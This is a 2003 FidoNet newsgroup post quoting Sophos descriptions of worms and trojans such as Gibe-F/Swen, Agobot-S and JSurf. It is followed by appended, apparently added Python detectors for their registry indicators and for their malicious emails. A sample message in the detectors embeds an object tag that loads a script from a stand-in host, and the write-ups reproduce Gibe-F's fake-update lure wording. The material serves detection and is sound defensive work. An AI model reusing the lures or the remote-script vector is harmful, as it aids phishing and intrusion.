echo: virus
to: ALL
from: KURT WISMER
date: 2003-09-20 21:00:00
subject: News

[cut-n-paste from sophos.com]

W32/Agobot-S

Aliases
Backdoor.Agobot.3.f, W32/Gaobot.worm.ab, W32.HLLW.Gaobot.AE, WORM_AGOBOT.AB

Type
Win32 worm

Detection
At the time of writing Sophos has received just one report of this worm from
the wild.

Description
W32/Agobot-S is an IRC backdoor Trojan and network worm.

W32/Agobot-S copies itself to network shares with weak passwords and attempts
to spread to computers using the DCOM RPC and the RPC locator vulnerabilities.

Microsoft has issued patches for the vulnerabilities exploited by this worm.
These patches are available from

http://www.microsoft.com/technet/security/bulletin/MS03-026.asp

and

http://www.microsoft.com/technet/security/bulletin/MS03-001.asp

When first run, W32/Agobot-S copies itself to the Windows System folder as
scvhost.exe and creates the following registry entries so that scvhost.exe is
run automatically each time Windows is started:

HKLM\Software\Microsoft\Windows\CurrentVersion\
Run\Config Loader = scvhost.exe

and

HKLM\Software\Microsoft\Windows\CurrentVersion\
RunServices\Config Loader = scvhost.exe

On Windows NT, 2000 and XP W32/Agobot-S may run itself as a new service called
Cfgldr.

Each time W32/Agobot-S is run it attempts to connect to a remote IRC server
and join a specific channel. W32/Agobot-S then runs continuously in the
background, allowing a remote intruder to access and control the computer via
IRC.





Troj/JSurf-A

Aliases
VBS/JunkSurf-A

Type
Trojan

Detection
Sophos has received several reports of this Trojan from the wild.

Description
Troj/JSurf-A arrives via an HTML email exploiting a vulnerability reportedly
fixed in the Cumulative Patch of Internet Explorer (MS03-032).

The email contains an Object Data tag that runs a VBS script on a remote site.
The script drops an EXE in the C:\ drive as DRG.EXE. This component of
Troj/JSurf-A connects to a remote website, downloads a DLL to C:\Program
Files\win32.dll and then runs regsvr32.exe to register it on the system.

The Trojan relies upon a vulnerability in Microsoft's software. Microsoft
issued a patch which reportedly fixes the problem in August 2003. The patch can
be found at www.microsoft.com/technet/security/bulletin/MS03-032.asp.





WM97/Oragon-A

Aliases
W97M.Ping.A, W97M_ORAGON.A

Type
Word 97 macro virus

Detection
At the time of writing Sophos has received just one report of this virus from
the wild.

Description
WM97/Oragon-A removes the Macro option from the Word Tools drop-down menu.

On the first day of the month WM97/Oragon-A sets the caption of the active
document so that it displays the username of the current user and attempts to
bring up an animation of the Office Assistant application.





W32/Gibe-F

Aliases
W32/Swen.A@mm, I-Worm.Swen, Worm.Automat.AHB

Type
Win32 worm

Detection
Sophos has received many reports of this worm from the wild.

Description
W32/Gibe-F is a worm which spreads by emailing itself via its own SMTP engine
to addresses extracted from various sources on the victim's drives (e.g. MBX
and DBX files). The worm also spreads using the KaZaA peer-to-peer shared
folders, via IRC channels and will copy itself to the Startup folder of mapped
network drives. W32/Gibe-F may also attempt to spread via usenet newsgroups
(NNTP).

W32/Gibe-F will attempt to get a user to enter email account details by
displaying a fake error dialog box with fields for entering user name,
password, email address and server names.

If the worm is run with a filename which starts with P, Q, U or I (regardless
of case), W32/Gibe-F displays the message

"Microsoft Internet Update Pack
This update does not need to be installed on this system" or

"This will install Microsoft Security Update. Do you wish to continue?"

and may also pretend to be an installation package by displaying an
installation window with the following messages in the title bar:

"Searching for installed components ..."
"Extracting files ..."
"Copying files ..."
"Updating registry ..."

If W32/Gibe-F detects the installation of a debugger active in memory it
displays the message "Try to pull my legs?".

The worm copies itself to the Windows folder as a randomly-named lowercase
executable (e.g. jlfsm.exe) and adds an entry to the registry at

HKLM\Software\Microsoft\Windows\CurrentVersion\Run

to run itself on system restart.

The worm also changes the entries in the registry at:

HKCR\exefile\shell\open\command
HKCR\regfile\shell\open\command
HKCR\comfile\shell\open\command
HKCR\batfile\shell\open\command
HKCR\piffile\shell\open\command
HKCR\scrfile\shell\open\command
HKCR\scrfile\shell\config\command

so that it is run before EXE, COM, PIF, BAT and SCR files are opened, and so
that a false error message (e.g. "Error occurred Memory access violation in
module kernel32 at :") is displayed when REG files are opened.

The worm sets several entries in the registry to signify installation, confirm
KaZaA infection and to prevent REGEDIT.EXE from running.

W32/Gibe-F may also create a file called SWEN1.DAT in the Windows folder
containing a list of several IP addresses and domain names which may be NNTP
servers.

W32/Gibe-F may attempt to exploit a vulnerability in Microsoft's software which
allows automatic execution of attachments while viewing an email message.
Microsoft issued a patch which reportedly fixes this vulnerability in 2001. The
patch is available from
www.microsoft.com/technet/security/bulletin/MS01-027.asp. (This patch fixes a
number of vulnerabilities in Microsoft's software, including the one exploited
by this worm.)

Emails constructed by the worm have the following characteristics:

From: may be the bona fide victim's name or may be randomly constructed from
the following

unknown
Microsoft
Support
Assistance
Services
Bulletin
Customer
Public
Technical
Center
Department
Section
Division
Security
Network
Internet
Program
Corporation
Microsoft
MS
Domain
Server
Receiver
Recipient
Client
Receiver
Recipient
Puremail
America
Netmail
Freemail
Bigfoot
Rocketmail
Routine
Program
Daemon
Automat
Engine
Service
Mailer
master
System
Service
Delivery
Storage
Message
Email
Postmaster
Administrator

and

bulletin
confidence
advisor
updates
technet
support
newsletters
ms
msn
microsoft
msdn
.com
.net

(e.g. MS Support Department@support.microsoft.com)

To: randomly constructed from the following

User
Client
Consumer
Partner
Customer
Commercial
Corporation
Microsoft
MS

Subject line: randomly constructed from the following

Corp.
Corporation
comes
which
Internet Explorer
Windows
update
package
correction
corrective
security
critical
internet
important
these
Install
Apply
Watch
Take a look at
Look at
Try on
Taste
Prove
Check out
Check
Upgrade
Update
Critical
Latest
Newest
Current
M$
MS
from
comes
came
which
this
that
these
the
See
Watch
Use
Apply

Message text: randomly constructed from the following

MS
Microsoft
Customer,
this is the latest version of security update, the
, Cumulative Patch update which
This update includes the functionality
of all previously released patches.
computer
system
on your
executable
to run
malicious user
attacker
the most serious of which could
allow an
from these vulnerabilities
maintain the security of your computer
protect your computer
continue keeping your computer secure
Install now to
vulnerabilities
newly discovered
as well as three
all known security vulnerabilities affecting
MS Internet Explorer, MS Outlook and MS Outlook Express
eliminates
resolves

the attached file (EXE, COM, PIF, BAT, SCR or ZIP) may have a randomly
generated name or may be randomly chosen from the following

PATCH
UPDATE
UPGRADE
INSTALL

W32/Gibe-F copies itself to the KaZaA shared folder and to the Windows folder
with various EXE or ZIP filenames randomly constructed from the following (e.g.
"WINZIP UPLOAD.EXE"):

Virus Generator
Magic Mushrooms Growing
Cooking with Cannabis
Hallucinogenic Screensaver
My naked sister
XXX Pictures
Sick Joke
XXX Video
XP update
Emulator PS2
XboX Emulator
HardPorn
Jenna Jameson
Hotmail hacker
Yahoo hacker
AOL hacker
fixtool
cleaner
removal tool
remover
Sircam
Bugbear
installer
upload
hacked
key generator
Windows Media Player
GetRight FTP
Download Accelerator
Winamp
WinZip
WinRar
KaZaA media desktop
Kazaa Lite

W32/Gibe-F attempts to terminate various processes related to anti-virus or
security software (e.g. sweep95, zonealarm and blackice).





W32/Opaserv-D

Aliases
Worm.Win32.Opasoft.d, BackDoor-ALB trojan

Type
Win32 worm

Detection
At the time of writing Sophos has received just one report of this worm from
the wild.

Description
W32/Opaserv-D is a variant of W32/Opaserv-A and is a worm that spreads via
network shares.

When executed the worm will create a file called scrsvr.exe in the Windows
folder on the current drive. W32/Opaserv-D then adds the following registry
entry to run itself when the system starts:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScrSvr =
C:\WINDOWS\ScrSvr.exe

The worm attempts to copy itself to the Windows folder on networked computers
with open shared drives. It then modifies the win.ini file on the remote
machine to ensure the copied file will be run on system start. The worm also
searches local IP addresses for open C: shares and attempts to copy itself to
the Windows folder of the share. Once the local area network has been scanned
the worm will start performing the same search on the internet starting at a
randomly generated IP address. As a result anyone connected to the internet who
has file sharing and NETBIOS over TCP/IP enabled is potentially vulnerable to
this worm.

W32/Opaserv-D also attempts to connect to a website that is currently
unavailable. This attempted connection is most likely intended as a means of
updating the worm executable.

The following three non-viral files may be found in the root folder of infected
systems:

tmp.ini
scrsin.dat
scrsout.dat





W32/Sluter-B

Aliases
W32.Randex.F

Type
Win32 worm

Detection
Sophos has received several reports of this worm from the wild.

Description
W32/Sluter-B is a worm that propagates over network shares with weak passwords.

The worm copies itself to the Windows system folder as netd32.exe and sets the
following registry entries so as to run on system startup:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Microsoft Network Daemon for Win32 = netd32.exe

and

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\
Microsoft Network Daemon for Win32 = netd32.exe

Additionally W32/Sluter-B acts as an IRC based backdoor Trojan, allowing a
remote intruder unlimited access to the affected computer.





WM97/Simuleek-C

Aliases
Macro.Word97.Omni, W97M.Radnet, W97M_BUHAY, W97M/Simuleek

Type
Word 97 macro virus

Detection
At the time of writing Sophos has received just one report of this virus from
the wild.

Description
WM97/Simuleek-C is a macro virus that drops a VBS script detected by Sophos
Anti-Virus as VBS/Simuleek-C.

VBS/Simuleek-C is added to the WIN.INI so that the script runs on startup. The
virus has the ability to re-infect the Word environment.

WM97/Simuleek-C may attempt to replace occurrences of the word "Ranuya" with
the word "John".





W32/Slanper-A

Aliases
W32/Slanper.worm, Win32/HLLW.Rejase.A

Type
Win32 worm

Detection
Sophos has received several reports of this worm from the wild.

Description
W32/Slanper-A is an internet worm that targets SMB/Windows shares using port
445. All Windows shares are SMB but SMB shares may also be hosted on Unix and
other operating systems. The worm may arrive with the filename msmsgri3.exe.

Upon execution the worm installs itself as a background process with the same
name and sets the registry entry

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\mssyslanhelper

to contain the path to itself.

W32/Slanper-A then generates a random list of IP numbers and attempts to
connect to them using port 445 in attempt to copy itself to available shares.
W32/Slanper-A also has some backdoor functionality.

The worm also extracts a secondary component to the same folder with the
filename payload.dat. If payload.dat is executed it sets the registry entry

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\System Initialization

to contain the path to itself, initiates TCP port connection and runs in the
background listening on open ports.





Troj/JSurf-B

Type
Trojan

Detection
At the time of writing Sophos has received just one report of this Trojan from
the wild.

Description
Troj/JSurf-B arrives via an HTML email exploiting a vulnerability reportedly
fixed in the Cumulative Patch of Internet Explorer (MS03-032).

The email contains an Object Data tag that runs a VBS script on a remote site.
The script drops an EXE in the C:\ drive as SFBAR.EXE. This component of
Troj/JSurf-B connects to a remote website, downloads a DLL to C:\Program
Files\win32.dll and then runs regsvr32.exe to register it on the system.

The Trojan relies upon a vulnerability in Microsoft's software. Microsoft
issued a patch which reportedly fixes the problem in August 2003. The patch can
be found at www.microsoft.com/technet/security/bulletin/MS03-032.asp.






 
--- MultiMail/Win32 v0.43
* Origin: Try Our Web Based QWK: DOCSPLACE.ORG (1:123/140)
SEEN-BY: 633/267 270
@PATH: 123/140 500 106/2000 633/267
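An added example, not part of Kurt's post or of the Sophos write-ups quoted above: a Python check that looks for the autostart and file-association entries the descriptions list (the Run/RunServices values of W32/Agobot-S, W32/Sluter-B, W32/Opaserv-D and W32/Slanper-A, the HKCR shell\open\command hijack of W32/Gibe-F, and the win.ini autostart used by W32/Opaserv-D and VBS/Simuleek-C) in a registry export (.reg) and a win.ini copy. The sample data is constructed for the example; the stock handler strings in EXPECTED_HANDLERS are assumed to be the standard Windows defaults, and the hijack command shown for Gibe-F is an assumed form, since the write-up gives only the example filename jlfsm.exe.

```python
import re

# Run/RunServices value names and image names quoted in the write-ups above.
RUN_VALUE_IOCS = {
    "config loader": "W32/Agobot-S",
    "microsoft network daemon for win32": "W32/Sluter-B",
    "scrsvr": "W32/Opaserv-D",
    "mssyslanhelper": "W32/Slanper-A",
    "system initialization": "W32/Slanper-A payload.dat",
}
RUN_IMAGE_IOCS = {"scvhost.exe", "netd32.exe", "scrsvr.exe", "msmsgri3.exe", "payload.dat"}
AUTORUN_SUFFIXES = ("\\currentversion\\run", "\\currentversion\\runservices")

# Stock handler commands for the HKCR keys W32/Gibe-F rewrites (assumption: the
# standard Windows defaults of an unmodified installation). Anything else means
# the handler has been hijacked to run something before the target file.
EXPECTED_HANDLERS = {
    "exefile\\shell\\open\\command": '"%1" %*',
    "comfile\\shell\\open\\command": '"%1" %*',
    "batfile\\shell\\open\\command": '"%1" %*',
    "piffile\\shell\\open\\command": '"%1" %*',
    "scrfile\\shell\\open\\command": '"%1" /S',
    "scrfile\\shell\\config\\command": '"%1"',
    "regfile\\shell\\open\\command": 'regedit.exe "%1"',
}

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _unescape(token):
    """Strip the quotes of a .reg string and undo its \\ and \" escapes."""
    token = token.strip()
    if len(token) >= 2 and token[0] == '"' and token[-1] == '"':
        token = token[1:-1]
    return re.sub(r"\\(.)", r"\1", token)


def parse_reg_export(text):
    """Parse .reg text into {key: {value_name: data}}; '' holds the (Default) value.
    Only single-line string values are handled, which is all autostart entries need."""
    tree, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "Windows Registry Editor")):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            tree.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = "" if m.group(1) == "@" else _unescape(m.group(1))
            tree[current][name] = _unescape(m.group(2))
    return tree


def _image_name(command):
    """Program of a command line (quoted paths may contain spaces), as a lowercase file name."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        program = command[1:end] if end > 0 else command[1:]
    else:
        program = command.split()[0] if command.split() else ""
    return program.rsplit("\\", 1)[-1].lower()


def scan_reg_export(text):
    """Return one finding string per matching autostart value or hijacked handler."""
    findings = []
    for key, values in parse_reg_export(text).items():
        lkey = key.lower()
        if lkey.endswith(AUTORUN_SUFFIXES):
            for name, data in values.items():
                tag = RUN_VALUE_IOCS.get(name.lower())
                if tag is None and _image_name(data) in RUN_IMAGE_IOCS:
                    tag = "known worm image name"
                if tag:
                    findings.append(f"{key}\\{name} = {data} ({tag})")
        for suffix, expected in EXPECTED_HANDLERS.items():
            if lkey.endswith(suffix):
                actual = values.get("", "")
                if actual.strip().lower() != expected.lower():
                    findings.append(f"{key} (Default) = {actual} (file association hijack, expected {expected})")
    return findings


def scan_win_ini(text):
    """Flag non-empty run=/load= lines in the [windows] section of win.ini."""
    findings, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "windows" and "=" in line:
            key, _, value = (p.strip() for p in line.partition("="))
            if key.lower() in ("run", "load") and value:
                findings.append(f"win.ini [windows] {key}={value} (win.ini autostart)")
    return findings


# Constructed sample data for the example (not taken from a real system).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Config Loader"="scvhost.exe"
"Microsoft Network Daemon for Win32"="netd32.exe"
"ScrSvr"="C:\\WINDOWS\\ScrSvr.exe"
"SoundMAX"="C:\\Program Files\\Analog Devices\\SoundMAX\\SMax4PNP.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Config Loader"="scvhost.exe"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"C:\\WINDOWS\\jlfsm.exe\" \"%1\" %*"

[HKEY_CLASSES_ROOT\regfile\shell\open\command]
@="regedit.exe \"%1\""
'''

SAMPLE_WIN_INI = """[windows]
load=
run=C:\\WINDOWS\\scrsvr.exe
NullPort=None
"""

if __name__ == "__main__":
    for finding in scan_reg_export(SAMPLE_REG) + scan_win_ini(SAMPLE_WIN_INI):
        print(finding)
```

Against a real machine, feed it the output of `reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run run.reg` (Version 5.00 exports are UTF-16, so open them with encoding="utf-16") and the HKCR keys the same way. Note that the Agobot-S name scvhost.exe is a lookalike of the legitimate svchost.exe, which is why the check keys on the exact value name and image name rather than on a substring.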

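A second added example, again not from the post or from Sophos: a Python mail filter applying the message-level characteristics described for Troj/JSurf-A and Troj/JSurf-B (an HTML message carrying an Object Data tag that points at a remote site) and for W32/Gibe-F (a sender dressed up as Microsoft support, an update-themed subject, and an EXE, COM, PIF, BAT, SCR or ZIP attachment). The three messages are constructed for the example; their addresses, the remote URL and the attachment bodies are made up, and the Microsoft-looking domain labels are taken from the From-address word list above.

```python
import re
from email import message_from_string, policy
from email.utils import parseaddr

# Attachment types the W32/Gibe-F write-up lists.
EXECUTABLE_EXTENSIONS = {".exe", ".com", ".pif", ".bat", ".scr", ".zip"}
# Brand labels from the worm's spoofed From-address word list (ms, msn, microsoft, msdn, technet).
SPOOFED_SENDER_LABELS = {"microsoft", "ms", "msn", "msdn", "technet"}
# Subject words from the same write-up that dress the mail up as a patch announcement.
SUBJECT_LURE_WORDS = {"update", "upgrade", "patch", "security", "critical", "internet explorer", "correction"}
# <object data="http://..."> inside an HTML body: the remote-script vector Troj/JSurf uses (MS03-032).
OBJECT_DATA_RE = re.compile(r'<object\b[^>]*?\bdata\s*=\s*["\']?\s*((?:https?|ftp)://[^"\'\s>]+)', re.I | re.S)


def scan_message(raw):
    """Return the list of indicators found in one RFC 822 message (empty if none)."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []

    _, address = parseaddr(str(msg.get("From", "")))
    domain = address.rpartition("@")[2].lower()
    if set(domain.split(".")) & SPOOFED_SENDER_LABELS:
        findings.append(f"sender claims a Microsoft address: {address}")

    subject = str(msg.get("Subject", "")).lower()
    lures = sorted(word for word in SUBJECT_LURE_WORDS if word in subject)
    if lures:
        findings.append("update-themed subject words: " + ", ".join(lures))

    for part in msg.walk():
        filename = part.get_filename()  # Content-Disposition filename or Content-Type name
        if filename and "." in filename:
            if "." + filename.rsplit(".", 1)[-1].lower() in EXECUTABLE_EXTENSIONS:
                findings.append(f"executable attachment: {filename}")
        if part.get_content_type() == "text/html":
            for url in OBJECT_DATA_RE.findall(part.get_content()):
                findings.append(f"remote object data tag: {url}")
    return findings


def is_suspicious(raw):
    """Alert only on the two indicators that carry code (executable attachment, remote
    object tag); the sender and subject findings are context for the analyst."""
    return any(f.startswith(("executable attachment", "remote object data")) for f in scan_message(raw))


# Constructed sample messages: addresses, URL and attachment bodies are made up.
GIBE_STYLE = """\
From: MS Support Department <support@microsoft.com>
Subject: Latest Internet Explorer Critical Update
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="us-ascii"

<html><body>MS Customer, this is the latest version of security update.
Install now to protect your computer.</body></html>
--b1
Content-Type: application/octet-stream; name="PATCH.EXE"
Content-Disposition: attachment; filename="PATCH.EXE"

dummy attachment body, not a real executable
--b1--
"""

JSURF_STYLE = """\
From: newsletter@example.net
Subject: weekly digest
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body><object data="http://dropper.example/run.vbs"></object>Read this week's digest.</body></html>
"""

BENIGN = """\
From: Alice <alice@example.com>
Subject: Q3 report
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b2"

--b2
Content-Type: text/plain; charset="us-ascii"

Attached as discussed.
--b2
Content-Type: application/pdf; name="q3-report.pdf"
Content-Disposition: attachment; filename="q3-report.pdf"

dummy attachment body
--b2--
"""

if __name__ == "__main__":
    for name, raw in (("Gibe-style", GIBE_STYLE), ("JSurf-style", JSURF_STYLE), ("benign", BENIGN)):
        print(name, is_suspicious(raw), scan_message(raw))
```

The verdict is deliberately tied to the attachment and object-tag checks: a message from a microsoft.com address with "security update" in the subject is also what a legitimate bulletin looks like, so those two findings are reported but do not on their own raise an alert.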
SOURCE: echomail via fidonet.ozzmosis.com
